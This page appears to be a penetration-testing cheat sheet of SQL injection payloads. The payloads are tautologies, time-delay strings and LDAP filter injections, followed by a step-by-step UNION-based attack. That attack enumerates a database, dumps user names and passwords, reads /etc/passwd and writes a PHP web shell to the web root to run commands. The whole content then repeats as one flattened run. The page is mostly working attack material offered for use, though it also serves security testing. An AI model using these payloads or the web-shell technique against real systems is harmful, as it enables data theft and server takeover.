SQL Injection Payloads

SQL Injection Payloads

<>"'%;)(&+
|
!
?
/
//
//*
'
' -- 
1 or 1=1
1;SELECT%20*
1 waitfor delay '0:0:10'--
'%20or%20''='
'%20or%201=1
')%20or%20('x'='x
'%20or%20'x'='x
%20or%20x=x
%20'sleep%2050'
%20$(sleep%2050)
%21
23 OR 1=1
%26
%27%20or%201=1
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
||6
'||'6
(||6)
%7C
a'
admin' or '
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
' and 1 in (select var from temp)--
anything' OR 'x'='x
"a"" or 1=1--"
a' or 1=1--
"a"" or 3=3--"
a' or 3=3--
a' or 'a' = 'a
&apos;%20OR
' having 1=1--
hi or 1=1 --"
hi' or 1=1 --
"hi"") or (""a""=""a"
hi or a=a
hi' or 'a'='a
hi') or ('a'='a
'hi' or 'x'='x';
insert
like
limit
*(|(mail=*))
*(|(objectclass=*))
or
' or ''='
 or 0=0 #"
' or 0=0 --
' or 0=0 #
" or 0=0 --
or 0=0 --
or 0=0 #
' or 1 --'
' or 1/*
; or '1'='1'
' or '1'='1
' or '1'='1'--
' or 1=1
' or 1=1 /*
' or 1=1--
' or 1=1-- 
'/**/or/**/1/**/=/**/1
‘ or 1=1 --
" or 1=1--
or 1=1
or 1=1--
 or 1=1 or ""=
' or 1=1 or ''='
' or 1 in (select @@version)--
or%201=1
or%201=1 --

SQL Injection Commands

# sql vulnerability exist
?id=1'

# number of columns
?id=1 order by 9 -- -

# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -

# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -

# Get version
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -

# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -

# Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -

# Get content from the users-table. From columns name and password. (0x3a creates a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users

# read file
?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- -
?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- -

# create a file and check if really exist
?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- -
	
# create a file to get a shell
?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>' ,6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- -

# then go to browser and see if you can execute commands
http://<ip_address>/shell.php?cmd=id

# Save file using UNION
' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php'  -- -'

PreviousEvasion Techniques NextLFI / RFI

Last updated 3 years ago

Was this helpful?

<>"'%;)(&+ | ! ? / // //* ' ' -- 1 or 1=1 1;SELECT%20* 1 waitfor delay '0:0:10'-- '%20or%20''=' '%20or%201=1 ')%20or%20('x'='x '%20or%20'x'='x %20or%20x=x %20'sleep%2050' %20$(sleep%2050) %21 23 OR 1=1 %26 %27%20or%201=1 %28 %29 %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C ||6 '||'6 (||6) %7C a' admin' or ' ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); ' and 1 in (select var from temp)-- anything' OR 'x'='x "a"" or 1=1--" a' or 1=1-- "a"" or 3=3--" a' or 3=3-- a' or 'a' = 'a '%20OR ' having 1=1-- hi or 1=1 --" hi' or 1=1 -- "hi"") or (""a""=""a" hi or a=a hi' or 'a'='a hi') or ('a'='a 'hi' or 'x'='x'; insert like limit *(|(mail=*)) *(|(objectclass=*)) or ' or ''=' or 0=0 #" ' or 0=0 -- ' or 0=0 # " or 0=0 -- or 0=0 -- or 0=0 # ' or 1 --' ' or 1/* ; or '1'='1' ' or '1'='1 ' or '1'='1'-- ' or 1=1 ' or 1=1 /* ' or 1=1-- ' or 1=1-- '/**/or/**/1/**/=/**/1 ‘ or 1=1 -- " or 1=1-- or 1=1 or 1=1-- or 1=1 or ""= ' or 1=1 or ''=' ' or 1 in (select @@version)-- or%201=1 or%201=1 --

# sql vulnerability exist ?id=1' # number of columns ?id=1 order by 9 -- - # Find space to output db ?id=1 union select 1,2,3,4,5,6,7,8,9 -- - # Get username of the sql-user ?id=1 union select 1,2,3,4,user(),6,7,8,9 -- - # Get version ?id=1 union select 1,2,3,4,version(),6,7,8,9 -- - # Get all tables ?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- - # Get all columns from a specific table ?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- - # Get content from the users-table. From columns name and password. (0x3a creates a delimiter between name and password) ?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users # read file ?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- - ?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- - # create a file and check if really exist ?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- - ?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- - # create a file to get a shell ?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>' ,6,7,8,9 into outfile '/var/www/shell.php' -- - ?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- - # then go to browser and see if you can execute commands http://<ip_address>/shell.php?cmd=id # Save file using UNION ' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php' -- -'